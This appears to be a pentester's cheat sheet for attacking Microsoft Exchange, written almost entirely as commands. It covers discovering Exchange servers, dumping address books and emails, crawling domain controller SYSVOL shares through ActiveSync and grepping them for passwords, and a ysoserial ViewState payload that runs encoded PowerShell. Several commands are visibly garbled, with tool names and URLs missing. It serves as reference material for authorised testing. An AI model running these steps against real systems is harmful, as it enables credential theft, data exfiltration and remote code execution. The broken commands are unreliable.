Pentesting Exchange Mindmap
Discover Exchange servers on the Perimeter from a large scope of subdomains:
$ cat subdomains.txt
$ for i in `cat subdomains.txt | rev | cut -d. -f1-2 | rev | sort -u`; do echo https://autodiscover.$i; done | httpx -silent -random-agent -fr -t 20 -sc -title -td -ip | grep Outlook | grep -oP '\d+\.\d+\.\d+\.\d+' | dnsx -silent -re -ptr [] [] []



$ ./ruler -k -d -u snovvcrash -p 'Passw0rd!' -e [email protected] --verbose abk dump -o gal.txt


PS > Get-GlobalAddressList -ExchHostname -UserName MEGACORP\snovvcrash -Password 'Passw0rd!' -OutFile gal.txt


Search for <OABUrl> node using Burp:
POST /autodiscover/autodiscover.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Authorization: Basic TUVHQUNPUlBcc25vdnZjcmFzaDpQYXNzdzByZCEK
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 350
<Autodiscover xmlns="">
<EMailAddress>[email protected]</EMailAddress>
Or with a Python script:
$ ./ MEGACORP/snovvcrash:'Passw0rd!' -e '[email protected]'
[*] Authenticated users's SID (X-BackEndCookie): S-1-5-21-3167813660-1240564177-918740779-3102
[+] DisplayName: Sam Freeside
[+] Server: [email protected]
[+] AD:
[+] OABUrl:<OABUrl>/
Get oab.xml and then oab.lzx:
$ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!'<OABUrl>/oab.xml > oab.xml
$ cat oab.xml | grep '.lzx' | grep data
$ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!'<OABUrl>/<LZXUrl> > oab.lzx
Install libmspack:
$ git clone ~/tools/libmspack && cd ~/tools/libmspack/libmspack
$ sudo apt install autoconf automake libtool -y
$ ./ && ./configure && make && cd -
Parse oab.lzx into oab.txt and extract emails from oab.txt with a regexp:
$ ~/tools/libmspack/libmspack/examples/oabextract oab.lzx oab.txt
$ strings oab.txt | egrep -o "[a-zA-Z0-9._%+-][email protected][a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}" | sort -u > emails.txt



$ git clone ~/tools/peas-m && cd ~/tools/peas-m
$ python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate
(venv) $ pip install --upgrade 'setuptools<45.0.0'
(venv) $ pip install -r requirements.txt
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --check
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --list-unc='\\DC01'
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --list-unc='\\DC01\SYSVOL\'
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --dl-unc='\\DC01\share\file.txt'
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --dl-unc='\\DC01\share\file.txt' -o file.txt
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --crawl-unc='\\DC01\share\' [--pattern xml,ini] [--download]
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --brute-unc [--prefix srv]


1. Use Nmap http-ntlm-info to get NetBIOS domain name and Exchange hostname: hunting for hostname pattern prefix if there is one.
2. Locate DC (guess it trying hostname pattern prefix) and mirror \\DC01\SYSVOL\megacorp.local\ share with --crawl-unc function:
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --crawl-unc='\\DC01\SYSVOL\\' --download
3. Find, xargs and grep for keywords in files: password, NetBIOS domain name (for additional account names), hostname pattern prefix (for additional hosts/shares):
$ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i -e password -e pass
$ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i <DOMAIN_NETBIOS_NAME>
$ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i <PREFIX>
4. (optional) Brute other share names:
$ python -m peas --brute-unc -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' [--prefix srv]


Get ViewStateUserKey: Browser > F12 > Storage > ASP.NET_SessionId
Get ViewStateGenerator: Browser > F12 > Console > document.getElementById("__VIEWSTATEGENERATOR").value
PS > [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$name = hostname;nslookup "$"'))
PS > .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc <BASE64_CMD>" --validationalg "SHA1" --validationkey "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --viewstateuserkey "<VIEWSTATE>" --generator "<GENERATOR>" --islegacy --isdebug<GENERATOR>&__VIEWSTATE=<VIEWSTATE>


List Address Books and count entities in every one of them:
$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi list-tables -count
Dump any specified Address Book by its name or GUID:
$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi dump-tables -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type EXTENDED -output-file gal.txt
$ cat gal.txt | grep 'mail,' | sort -u | awk -F' ' '{print $3}' > emails.txt
Return AD objects by their GUIDs:
PS > (Get-ADuser -Identity snovvcrash).ObjectGUID
$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi guid-known -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type FULL
Dump all AD records via requesting DNTs:
$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi dnt-lookup -lookup-type EXTENDED -start-dnt 0 -stop-dnt 500000 -output-file dnt-dump.txt
Last modified 1mo ago